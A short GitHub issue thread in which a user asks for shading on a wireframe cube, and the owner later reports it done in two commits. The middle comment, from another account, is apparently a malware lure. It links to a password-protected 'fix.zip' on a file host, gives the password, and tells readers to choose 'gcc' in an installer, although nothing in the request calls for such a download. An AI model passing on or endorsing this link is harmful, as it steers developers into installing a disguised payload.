### ISSUE TITLE
Implement shading on cube faces

### ISSUE THREAD

**Issue by drewwalton19216801** [drewwalton19216801/cube3d#2]
A wireframe cube is cool, but can we implement shading?

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by drewwalton19216801** [comment]
Implemented in d7932af and fixed in 0f9c9a7
